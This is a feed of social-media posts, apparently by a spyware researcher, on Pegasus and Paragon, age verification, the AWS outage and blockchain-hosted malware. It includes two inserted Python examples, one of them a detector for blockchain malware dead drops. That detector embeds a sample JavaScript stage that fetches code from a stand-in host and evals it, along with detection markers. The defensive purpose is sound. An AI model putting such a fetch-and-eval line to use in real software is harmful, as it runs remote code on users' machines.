Hotel toilet privacy is disappearing.
Glass doors.
Or no door.
Or a big window into the room.
Who is asking for this?
Suddenly hearing about zcash everywhere.
Feels inorganic.
What's up?
YIKES: NSO floats Pegasus spyware use in a "time of domestic crisis" in 🇺🇸America.
I believe they won't stop lobbying until they get Pegasus into USA.
To hack Americans. 
POV: you can't sleep because your bed can't talk to AWS.

Design thinking that inserts brittle dependence into our lives while extracting fees for life.
Don't be these guys.
GOOD MORNING.
Today's massive outages nicely illustrate which of your favorite internet things are secretly Amazon-dependent.
Specifically on US-EAST-1 Region, which woke up with Main Character Syndrome.
Result? Massive outages.
Sure, Amazon has regions.

But US-EAST-1 is the legacy/default for a pile of services...and other Global Amazon services also depended on it.
So when there was trouble...it was quickly everywhere.
Hyperscalers rule *almost* everything around us. And this is absolutely bad news for all sorts of resiliency.

Amazon sez: root cause = DNS resolution with DynamoDB... which a ton depends on.
They say they are mostly mitigated & have a pile of backlog to clear.

But this is a great moment to think about just how many eggs that matter are in one basket...
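One way to answer "which of my dependencies are secretly in US-EAST-1" is to resolve each external hostname you rely on and map the addresses onto Amazon's published prefix list. The following is an added example, not part of the original post: it uses the schema of https://ip-ranges.amazonaws.com/ip-ranges.json, but the prefixes, hostnames and addresses below are constructed (RFC 5737 documentation ranges), not Amazon's real ranges or anyone's real infrastructure.

```python
"""Added example: classify resolved dependency addresses against AWS-published prefixes
to find what sits in a single region (here us-east-1)."""
import ipaddress
import json

# Constructed stand-in for ip-ranges.json. Same schema as the real file, but the
# prefixes are RFC 5737 test ranges, NOT Amazon's real ones.
SAMPLE_IP_RANGES = json.dumps({
    "syncToken": "0",
    "prefixes": [
        {"ip_prefix": "192.0.2.0/24", "region": "us-east-1", "service": "AMAZON"},
        {"ip_prefix": "192.0.2.0/25", "region": "us-east-1", "service": "DYNAMODB"},
        {"ip_prefix": "198.51.100.0/24", "region": "eu-west-1", "service": "AMAZON"},
    ],
})

# Constructed resolver output (hostname -> addresses), as if from your own DNS lookups.
SAMPLE_RESOLUTIONS = {
    "api.example.test": ["192.0.2.10"],
    "static.example.test": ["198.51.100.7"],
    "selfhosted.example.test": ["203.0.113.5"],
}


def load_prefixes(ip_ranges_json: str):
    """Parse the ip-ranges.json schema into (network, region, service) tuples."""
    doc = json.loads(ip_ranges_json)
    return [(ipaddress.ip_network(p["ip_prefix"]), p["region"], p["service"])
            for p in doc["prefixes"]]


def classify(addr: str, prefixes):
    """Return (region, service) of the most specific matching prefix, or None if not in AWS space.
    AWS lists overlapping entries (AMAZON superset plus per-service prefixes), so prefer the longest."""
    ip = ipaddress.ip_address(addr)
    best = None
    for net, region, service in prefixes:
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, region, service)
    return None if best is None else (best[1], best[2])


def audit(resolutions, prefixes, region="us-east-1"):
    """Group hostnames into: any address in `region`, elsewhere in AWS, or outside AWS."""
    report = {"in_region": {}, "other_aws": {}, "non_aws": []}
    for host, addrs in resolutions.items():
        hits = [(a, classify(a, prefixes)) for a in addrs]
        regional = {a: c for a, c in hits if c and c[0] == region}
        aws = {a: c for a, c in hits if c}
        if regional:
            report["in_region"][host] = regional
        elif aws:
            report["other_aws"][host] = aws
        else:
            report["non_aws"].append(host)
    return report


if __name__ == "__main__":
    prefixes = load_prefixes(SAMPLE_IP_RANGES)
    for bucket, hosts in audit(SAMPLE_RESOLUTIONS, prefixes).items():
        print(bucket, hosts)
```

In practice, feed `load_prefixes` the real ip-ranges.json and `audit` the A/AAAA answers for every hostname in your config, SaaS integrations and CDN origins; the caveat is that a hostname fronted by a CDN or another region can still have a hidden control-plane dependency on us-east-1, which an IP mapping will not reveal.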
NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain.
Result: decentralized, immutable malware from a government crypto theft operation.

It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server)

Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.

And Blockchain explorers are a natural target.

Nearly impossible to remove.

Experimentation with putting malware on blockchains is in infancy.
Ultimately there will be some efforts to try and implement social engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is going to be productive for a long time.
Still, whereas here they used social engineering, I expect attackers to also experiment with directly loading zero click exploits onto blockchains targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets.
REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
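For defenders, the interesting question is what the dead drop looks like on the wire. The following is an added example, not code from the post or from the Google report: it assumes the loader retrieves its next stage with a read-only JSON-RPC `eth_call` whose return value is an ABI-encoded string (an assumption about the mechanism, not something the post states), decodes that value, and flags script-like content. The sample payload, the RPC response and the marker strings are all constructed for illustration.

```python
"""Added example: decode the ABI-encoded string returned by an eth_call and flag
responses that carry executable script rather than ordinary contract data."""
import json
import re

# Constructed sample of the kind of JavaScript stage a dead-drop contract might return.
# Illustrative only; the hostname is a reserved .invalid name.
SAMPLE_PAYLOAD = (b'var c2="https://update.example.invalid/s.js";'
                  b'fetch(c2).then(r=>r.text()).then(s=>eval(s));')

# Hypothetical markers; a real ruleset would be tuned to the loader family being tracked.
SCRIPT_MARKERS = (b"eval(", b"new Function", b"fetch(", b"document.", b"XMLHttpRequest")


def abi_encode_string(s: bytes) -> bytes:
    """ABI-encode a single dynamic string/bytes return value:
    32-byte head offset (0x20), 32-byte length, then data right-padded to 32 bytes."""
    head = (0x20).to_bytes(32, "big")
    length = len(s).to_bytes(32, "big")
    pad = (-len(s)) % 32
    return head + length + s + b"\x00" * pad


def abi_decode_string(data: bytes) -> bytes:
    """Inverse of abi_encode_string; raises ValueError on malformed or truncated input."""
    if len(data) < 64:
        raise ValueError("too short for a dynamic return value")
    offset = int.from_bytes(data[:32], "big")
    if offset + 32 > len(data):
        raise ValueError("offset past end of data")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("length past end of data")
    return data[start:start + length]


def inspect_eth_call_response(body: str) -> dict:
    """Decode a JSON-RPC eth_call response and report whether the returned string looks like script."""
    obj = json.loads(body)
    result = obj.get("result", "")
    if not isinstance(result, str) or not result.startswith("0x"):
        return {"decoded": None, "suspicious": False, "reason": "no hex result"}
    try:
        decoded = abi_decode_string(bytes.fromhex(result[2:]))
    except ValueError as e:
        return {"decoded": None, "suspicious": False, "reason": str(e)}
    hits = [m.decode() for m in SCRIPT_MARKERS if m in decoded]
    urls = [u.decode() for u in re.findall(rb"https?://[^\s\"']+", decoded)]
    return {"decoded": decoded, "suspicious": bool(hits), "markers": hits, "urls": urls}


def make_sample_response(payload: bytes = SAMPLE_PAYLOAD) -> str:
    """Build a constructed JSON-RPC eth_call response carrying `payload` as the return value."""
    return json.dumps({"jsonrpc": "2.0", "id": 1,
                       "result": "0x" + abi_encode_string(payload).hex()})


if __name__ == "__main__":
    print(inspect_eth_call_response(make_sample_response()))
```

Because the stage is read back through ordinary public RPC endpoints, blocking the chain itself is not an option; what you can do is inspect or proxy outbound JSON-RPC from hosts that have no business talking to a blockchain, decode what comes back, and alert when a "contract read" yields JavaScript and a fresh C2 URL.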
NEW: Cost to 'poison' an LLM and insert backdoors is relatively constant. Even as models grow.
Implication: scaling security is orders-of-magnitude harder than scaling LLMs.

Prior work had suggested that as model sizes grew, it would make them cost-prohibitive to poison.

So, in LLM training-set-land, dilution isn't the solution to pollution.
Just about the same size of poisoned training data that works on a 1B model could also work on a 1T model.

I feel like this is something that cybersecurity folks will find intuitive: lots of attacks scale. Most defenses don't
PAPER: POISONING ATTACKS ON LLMS REQUIRE A NEAR-CONSTANT NUMBER OF POISON SAMPLES https://arxiv.org/pdf/2510.07192
Only four fire department callouts?
Clearly the Asian market isn't stocking enough durians.

Durian is one of the only fruits where your nose can tell you if it's in stock before you get near the section.

Also, I disagree that Durian smells of gas. It smells of sweet old wet socks and vanilla ice cream.

NEW: breach of Discord age verification data.
For some users this means their passports & drivers licenses.
Discord has only run age verification for 6 months.
Age verification is a badly implemented data grab wrapped in a moral panic.

Proponents say age verification = showing your ID at the door to a bar.
But the analogy is often wrong.
It's more like: bouncer photocopies some IDs, & keeps them in a shed around back.
There will be more breaches.
But it should bother you that the technology promised to make us all safer, is quickly making us less so.
STORIES:
https://www.theverge.com/news/792032/discord-customer-service-data-breach-hack
NEW: turns out the EU helped finance a bunch of spyware companies with..public money.
That's YOUR money if you live in Europe.
You deserve to know that your money is fueling spyware companies like Paragon.

And if you aren't in Europe? There's a good chance that the mercenary spyware crisis is still fueled by your pensions & tax dollars.
Whether it's Oregon public employees or Alaskans, Europeans or folks in South Yorkshire...
The Fund managers stewarding your cash bear a heavy ethical responsibility for the harms they turbocharged.
And they completely sidestep it.
Now a group of MEPs from 4 EU political groups is calling for action & transparency. Good to see them leaning in...

It's great to see a cross-cutting call for action...

Kudos to these MEPs for standing up. But honestly, there should be many, many more..

Here's the story: https://apache.be/2025/10/01/european-investment-fund-eif-financed-israeli-spyware-company-paragon
PAY ATTENTION: The UK again asked Apple to backdoor iCloud encryption.
Backdoors create a massive target for hackers & criminal groups.

Dictators will inevitably demand that Apple build the same access structure for them.
They insert vulnerable bad things right at the place where we need the strongest protections.

This latest attempt to demand access is *yet another* unreasonable, secret demand on Apple (a TCN) from the Home Office....
https://www.ft.com/content/d101fd62-14f9-4f51-beff-ea41e8794265
Friend,
If scrolling leaves you feeling hollowed...
If anger is frictionless and thinking feels like fighting the current,
You're not swimming, you're being swept in an algorithmic rip tide.
And your mental clarity is the target.
So, take a beat and step out
Put the thing down.
Connect with your own thoughts.
It's what the designers of these algorithms fear most.
New episode just dropped with nostr:nprofile1qydhwumn8ghj7mn0wd68yttsw43zuum9d45hxmmv9ejx2aspr4mhxue69uhkummnw3ez6ur4vgh8wetvd3hhyer9wghxuet5qqsxp8ccdjsz84jccrlqr9tsguh4j4ju30sac93mz4ql4jwep2jw3tc6ev6xs and it was a banger!
Exposing Pegasus: How the State Spies on You | John Scott-Railton
We discuss:
- Exposing Pegasus
- Governments spying on you
- The end of free speech
- AI changing surveillance
Watch it here: https://youtu.be/iz_8ELBJRF0
Honored to be invited to share my views on the podcast. You are a gentleman and a scholar.
Thank you for having me nostr:nprofile1qyxhwumn8ghj7cnjvghxjme0qyt8wumn8ghj7etyv4hzumn0wd68ytnvv9hxgtcqyrtl8gkckam5xwfxugu46v2e3yhgg70gwx5qpeqp7prlkz9dzlejkvg2vts
The internet needs YOU to stand up against surveillance abuses & mercenary spyware.
Thank you for your attention to this matter.
NEW: foreign mercenary spyware is coming to the US.
ICE just quietly unsuspended contract with spyware maker #Paragon.
They got caught this year being used to hack journalists.
Friend, let me bring you up to speed on why this is bad on multiple fronts.

YOUR BACKGROUND BRIEF:
#Paragon was co-founded in Israel in 2019 by ex head of Israel's NSA equivalent (Unit 8200) w/ major backing from former Israeli PM Ehud Barak.
Pitched themselves as stealthy & abuse-proof alternative to NSO Group's Pegasus.

The company has been trying to get into the US market for years.
For a long time all we knew about Paragon was their performance as a 'virtuous' spyware company with values.

All that came to a crashing halt in 2025 when they got very caught, helping customers hack targets across #WhatsApp.
WhatsApp did the right thing & notified users.

Almost immediately after the WhatsApp notifications, we started learning about the targets.
They weren't the supposed serious criminals... They were Journalists... human rights defenders...groups working on sea rescues.. etc
In other words, a very NSO-like scandal.

Ultimately Paragon & its Italian customer had a massive spyware scandal on their hands.
WhatsApp wasn't the only player tracking Paragon & doing user notifications. Apple got in on the game.
Ultimately, we at the Citizen Lab had forensically analyzed cases from each notification round.

We testified to Italy's parliamentary intelligence oversight committee about our findings.


The conclusion? Deeply unsatisfactory.
Italy admitted hacking some targets, but denied hacking journalists.
Tons of loose ends with Paragon. And they haven't been honest about who used their tech to hack journalists in Europe.
BIG PICTURE:
After 14 years investigating countless spyware companies, I tell you with confidence:
Mercenary spyware is a power abuse machine incompatible with American constitutional rights and freedoms.
Our legal system isn't designed for it, oversight mechanisms are woefully inadequate to protect our rights...
Here's the thing. You probably know that mercenary spyware like #Pegasus gets sold to dictators.
Who, predictably, abuse it.
But We have a growing pile of cases where spyware is sold to democracies... and then gets abused.
HISTORY LESSONS
History shows: secret surveillance usually winds up abused.
The history of the US is littered with surveillance abuses.
Thing is, our phones offer an unprecedented window into our lives.
Making zero-click mercenary spyware an especially grave risk to all our freedoms.
If the government wants access to your accounts for law enforcement...they have to prepare a judicially authorized request and send it to the company, which reviews it.
Mercenary spyware bypasses any external review.
And the whole industry behind it seeks maximum obscurity.
COUNTERINTELLIGENCE THREATS? YEAH THAT TOO
I'm concerned about the impact on our rights and our privacy.
But there's something else that should worry everybody about the choice to work with the company: Paragon poses a potentially grave counterintelligence threat to the US. Let me explain.
When you use an integrated spyware package to conduct sensitive law enforcement / intelligence business, you have to place a lot of trust in them...
If the developers originate from a foreign intelligence service that aggressively collects against the US government, that should be a huge red flag.
America (or any country) should be maximally wary about using foreign-developed surveillance tech for the same reason that America shouldn't operate a Chinese-made stealth fighter.
So, have Paragon's spyware, people & ops been aggressively vetted for technical and human counterintelligence risks?
MERCENARY SPYWARE = FATE SHARING
Paragon's #Graphite mercenary spyware shares the same downsides as other products in their class:
❌They keep getting caught
We researchers aren't the only ones that have found techniques for tracking and identifying Paragon spyware... I'm sure hostile govs have too.

❌Customers fate share.
Since all customers roll the same tech, when one gets caught it impacts & potentially exposes everyone's activities.
Now, that fate sharing will include US law enforcement activity.
WHAT CAN YOU DO?
What can you do? Take 5 minutes and call your member of Congress.
Ask them to request a briefing on Paragon.
They should ask whether the company was properly vetted & reviewed.
What is the oversight mechanism for this maximally invasive technology?
What are the guardrails? How would abuses be handled? Etc.
PERSONAL SECURITY?
Paragon & this category of spyware is fiendishly hard to track & defend against.
And on a personal level? Apple's Lockdown Mode & Android Advanced Protection both offer some serious security benefits but neither is a silver bullet..
Unfortunately, as of right now I am pretty confident that no publicly available / commercially developed third party tool can reliably detect Paragon spyware either in realtime. Or retrospectively.
Beware a false sense of security.
If you got this far & found this post useful, let me know! Drop a comment.
SELECTED READING LIST
Exclusive: ICE reactivated its $2 million contract with Israeli spyware firm Paragon, following its acquisition by U.S. capital
https://jackpoulson.substack.com/p/exclusive-ice-has-reactivated-its
Virtue or Vice? A First Look at Paragon’s Proliferating Spyware Operations
https://citizenlab.ca/2025/03/a-first-look-at-paragons-proliferating-spyware-operations/
Graphite Caught
First Forensic Confirmation of Paragon’s iOS Mercenary Spyware Finds Journalists Targeted
GOOD MORNING: WhatsApp caught & fixed a sophisticated zero click attack...
They just published an advisory about it.
They say attackers combined the exploit with an Apple vulnerability to hack a specific group of targets (i.e. this wasn't pointed at everybody)

That's a CROSS-APP exploit chain. Which is fancy. We'll discuss in a second.
But wait, you say, haven't I heard of WhatsApp zero-click exploits not so long ago?
You have.
A big user base makes a platform a big target for exploit development.
Attacker's perspective = an exploit against a popular messenger gives you potential access to a lot of devices.
The regular tempo of large platforms catching sophisticated exploits is a good sign.
They're paying attention & devoting resources to a growing category: highly targeted, sophisticated attacks.
But it's also a reminder of the magnitude of the threat.

Here's the Apple CVE.
Somewhere, earlier this summer, some people in a room probably had a bad day when this clever cross-app chain stopped working.
The cross-app chain = probably also a sign of the increasing tech lift required to get to device compromise. Consequence of various mitigations.
The cost-to-compromise is only going up. Which is arguably a sign that the increasing scrutiny + efforts by platforms & OS developers is having an impact.
That said, the threat of this stuff is going nowhere because there's an infinite governmental appetite for compromise.
Still, I'd argue that increasing costs of zero-clicks has the effect of pricing out a bunch of potential actors which slows the proliferation of this tech to *some* bad actors.
WhatsApp Advisory: https://www.whatsapp.com/security/advisories/2025/
Apple Advisory: https://support.apple.com/en-us/124925
The water is boiling.
Frog, it's time to get out of the pot.

Did the University of Chicago blow their endowment on shitcoins?
Nobody is exactly sure how much they gambled and lost on 'crypto.'
But they are now freezing research amidst federal funding cuts.

If only they'd put that money into BTC those labs where I slaved away as an undergrad would be humming.
Age-verification laws are a universal mute button for free speech.
Government‑mandated KYC to read is coming fast.
And the walls of castle freedom are cracking.

Why haven't mosquitoes evolved silent flight?
"everybody who's out there thinking of using VPNs, let me just say to you directly, verifying your age keeps a child safe...So let's just not try and find a way around. Just prove your age."
- UK government.
https://blossom.primal.net/603be98e6ef0e56611d5583c63c9ec0b2461541b81785456cd0441048b2db5d3.mp4
WHOA: Could Germany Ban Ad Blockers?
German megapublisher Axel Springer is asking a German court to ban an ad-blocker.
They claim HTML/ CSS of their sites are protected computer programs.
And influencing how they are displayed (e.g. by removing ads) violates copyright.

I'm in puzzled wonderment at this claim.
Preventing ad-blocking would be a huge blow to German cybersecurity and privacy.

There are critical security & privacy reasons to influence how a website's code gets displayed.
Like stripping out dangerous code & malvertising.
Hacking risks from online advertising are documented.

Any attempt to force Germans to run all of the code on a website without consideration for their privacy and security rights and needs will end very, very poorly.
Defining HTML/CSS as a protected computer program will quickly lead to absurdities touching every corner of the internet.
Just think of the potential infringements:
-Screen readers for the blind
-'Dark mode' browser extensions
-Displaying snippets of code in a university class
-Inspecting & modifying code in your own browser
-Website translators
Or blocking unwanted trackers.
This is why most governments do it on their systems.

I'm not a lawyer, but if Axel Springer wins the consequences are just nuts:
Basic stuff like bookmarking & saving a local copy of a website might be legally risky.
The Wayback Machine & internet archives and libraries might be violators.
This might even extend to search engines displaying excerpts of sites.
Code sharing sites like GitHub could become a liability minefield...
The list goes on and on.
Finally, only one country has banned ad-blockers. China.
This is not good company for Germany.
READ MORE: From Mozilla https://blog.mozilla.org/netpolicy/2025/08/14/is-germany-on-the-brink-of-banning-ad-blockers-user-freedom-privacy-and-security-is-at-risk/
Bleeping Computer: https://www.bleepingcomputer.com/news/legal/mozilla-warns-germany-could-soon-declare-ad-blockers-illegal/
NEW: UK reportedly drops secret demand for Apple encryption backdoor.
Good.

While there was strong activist pressure here the key push came from the US government.

But there is zero rest for the weary as the UK has been leaning much harder into Age Verification.
Which is another mechanism for gaining deep visibility into peoples online activity.
Story: https://www.theverge.com/news/761240/uk-apple-us-encryption-back-door-demands-dropped
Yeah! Humans do OSINT. Some do it super well.
So what is different about an automated house locator as a service that uses dwelling interior pics?
Turns out we counted on friction to protect us.
Not rules. Not norms.
There just weren't millions of Trevor Rainbolts that could instantly OSINT anything that invasive.

It was a cost thing.
Meanwhile the datasets were getting collected. Zillow. AirBnB.. etc etc.
When the right invasive automation came along... the privacy / rights intrusion became automated & scaled. Unstoppable.
And we were left unprotected.
Like with so many privacy & power things.
I have, it's a clever vector.
But what I find especially interesting is how all of the old categories of attack are sort of getting...rediscovered for the vibecoding era.
This is like the reboot of typosquatting.
Neuroticism? Ripping.
Conscientiousness & agreeableness? Dipping.

Via FT: https://www.ft.com/content/5cd77ef0-b546-4105-8946-36db3f84dc43
If you want to browse the data yourself you can get it here: https://uasvis.usc.edu/corevisualization.php 
Internet-connected microphones in school bathrooms.
What could go wrong?

Mandated microphones in private spaces are a bad idea.
Throwing invasive sensors into private spaces rarely fixes socially scary problems.
But is almost guaranteed to have risky downsides. 
Story: https://www.wired.com/story/school-bathroom-vape-detector-audio-bug/
Age verification laws are coming fast.
And, from my perspective, opponents are struggling to find impactful messaging to explain to the general public the damage they are about to do to freedom.
Or to propose alternate futures that address the underlying anxieties.
Sure, most folks that are here on #Nostr intuitively understand the dangers... And nod along when we gesture at the dangers of surveillance overreach.
But I worry that the common language for talking about these initiatives typically relies on some priors that are not universally shared outside people that live and breathe concerns about tech.
Saying that something is a surveillance dystopia works on me. But not the neighbors.
I'm guilty of being inside this language bubble too, and it's hard to escape.
Yet, when faced with politicians talking about protecting kids from bad things that parents feel they see right now... I worry that the communities doing pushback are struggling to:
1 - find framing that makes *enough sense* to the vast majority of people that they say 'ok this is net bad' and push back
2 - find their own ways to productively connect with the anxieties that politicians are drawing on. E.g. worried parents.
3 - offer things that are honest, well meaning alternative paths for the underlying problems
Anyone have thoughts on this? #AskNostr
BREAKING: jury awards massive $167 million in punitive damages against spyware company NSO Group.

It turns out that the regular people on a jury think it is evil when you help dictators hack dissidents.
After years of every trick & delay tactic it only took a California jury ONE DAY of deliberation to get this Monsanto-scale verdict. Precedent-setting win against notorious #Pegasus spyware maker.
BACKSTORY:
Rewind to 2019. About this time (April-May) #WhatsApp catches NSO Group hacking its users with #Pegasus.
They investigated.

We at Citizen Lab helped to investigate the targets & get in touch with the activists, journalists & civil society members that were targeted

We identified at least 100. And got in touch. It was a tremendous push of sleepless days. But it made it so clear just how much harm was being done.
Then, in October 2019 WhatsApp sued.
Prior to the lawsuit, NSO had acted the playground bully.
Targeting victims that dared speak up & researchers like us.
Suddenly, the bully wasn't so surefooted. Like the scene in a high school movie where the cousin shows up in the beat up car & collars the bully.
You might not remember, but in 2019 no country had sanctioned NSO Group... No parliamentary hearings, no hearings in congress, no serious investigations.
For years, WhatsApp's lawsuit helped carry momentum & showed governments that their tech sectors were in the crosshairs from mercenary spyware too...
Credit due to Meta & WhatsApp leadership on this one, they stuck the fight out & carried it across the finish line.
NOTIFICATIONS MATTER
WhatsApp's choice to notify targets was also hugely consequential.
A lot of cases were first surfaced from these notifications.
With dissidents around the world suddenly learning that dictators were snooping in their phones...with NSO Group's help.
A SIDEBAR: HARASSING RESEARCHERS
One of NSO's many tactics was to leverage the case to badger me & us Citizen Lab researchers to try and extract information.

It never worked, but it laid bare the tactics that these firms prefer...instead of coming clean.
ROLE OF CIVIL SOCIETY
Ultimately, we wouldn't be here without civil society investigations of mercenary spyware... and alarm raising.
And victims choosing to come forward.
Thankfully today there's a whole accountability ecosystem growing around this work.
Dozens of orgs engaging.
Numbers are growing.
IS THERE GONNA BE IMPACT? YES
NSO Group emerges from the trial severely damaged.
The damages ($167,254,000 punitive, $440K+ compensatory) are big enough to make your eyes water.
NSO'S BUSINESS IS NOW ALL OVER THE NET
The case is also a blow to NSO's secrecy, with their business splashed all over a courtroom.

WhatsApp just published NSO's depositions, exposing an unprecedented amount of info on a spyware company's operations:
This will scare customers. And investors. And other companies that do the same thing. Good.
MY VIEW:
Watching a jury of regular citizens see right through NSO's mendacity & hypocrisy...and to the need to protect privacy is amazing.
Gives me hope.
Despite all the fancy lawyering & lobbying, people know that this kind of privacy invasion is wrong.
Read more:
They Exposed an Israeli Spyware Firm. Now the Company Is Badgering Them in Court. https://theintercept.com/2024/05/06/pegasus-nso-group-israeli-spyware-citizen-lab/
Spyware maker NSO ordered to pay $167 million for hacking WhatsApp
https://www.washingtonpost.com/technology/2025/05/06/nso-pegasus-whatsapp-damages/
NSO Group must pay more than $167 million in damages to WhatsApp for spyware campaign https://techcrunch.com/2025/05/06/nso-group-must-pay-more-than-167-million-in-damages-to-whatsapp-for-spyware-campaign/
Coda: WhatsApp acknowledges long road to collecting damages, but are stating their intention to donate to help orgs that assist spyware victims.

Source: https://about.fb.com/news/2025/05/winning-the-fight-against-spyware-merchant-nso/
